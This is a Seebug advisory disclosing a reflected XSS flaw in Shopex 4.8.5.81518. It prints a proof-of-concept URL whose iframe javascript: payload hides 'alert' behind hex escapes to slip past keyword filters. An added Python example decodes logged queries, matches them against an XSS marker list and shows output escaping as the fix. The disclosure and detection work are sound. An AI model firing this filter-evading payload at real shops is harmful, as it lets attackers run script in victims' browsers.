Shopex Reflected XSS

2013-12-10T00:00:00
ID SSV:93577
Type seebug
Reporter Root
Modified 2013-12-10T00:00:00

Description

Brief description:

Reflected XSS in Shopex 4.8.5.81518

Details:

http://site/shopex-single-4.8.5.81518/index.php?product-"><iframe src=javascript:window["\x61\x6c\x65\x72\x74"](0x1) -30763-viewpic.html

With a little encoding, alert(1) fires.

Proof of vulnerability:

Screenshot: shopex_xss.jpg (https://images.seebug.org/upload/201312/1016204991e56ba772f0266ce04944c8239e649a.jpg)
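
The request above hides the word alert behind JavaScript \xNN escapes, so a keyword check on the raw query string does not see it. The following is an added example, not part of the original advisory or of Shopex: it normalizes a logged query string before matching and shows HTML-escaping the reflected value. The marker list, the function names and the percent-encoded variant are constructed for illustration, and it assumes the value is reflected into HTML markup.

```python
import html
import re
from urllib.parse import quote, unquote

# Query string taken from the URL in this advisory.
PAGE_QUERY = r'product-"><iframe src=javascript:window["\x61\x6c\x65\x72\x74"](0x1) -30763-viewpic.html'
# Constructed variant: the same string fully percent-encoded, as it may appear in an access log.
ENCODED_QUERY = quote(PAGE_QUERY, safe="")

# Constructed marker list for this example; a real rule set would be broader.
MARKERS = ("<iframe", "<script", "javascript:", "alert", "onerror=")
JS_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})")

def normalize(query):
    # Undo percent-encoding first, then resolve JavaScript \xNN and \uNNNN escapes.
    decoded = unquote(query)
    decoded = JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), decoded)
    return decoded.lower()

def naive_hits(query):
    # Matching on the raw string, the way a simple keyword filter would.
    return [m for m in MARKERS if m in query.lower()]

def normalized_hits(query):
    # Matching after normalization, for log review or a detection rule.
    text = normalize(query)
    return [m for m in MARKERS if m in text]

def escape_for_html(value):
    # Mitigation at the sink: encode the reflected value so it stays text
    # and cannot close the surrounding attribute or open a new tag.
    return html.escape(value, quote=True)

if __name__ == "__main__":
    for label, q in (("as published", PAGE_QUERY), ("percent-encoded", ENCODED_QUERY)):
        print(label, "| naive:", naive_hits(q), "| normalized:", normalized_hits(q))
    print(escape_for_html(PAGE_QUERY))
```

Detection on normalized input is a monitoring aid; the fix is the output encoding at the point where the value is written into the page.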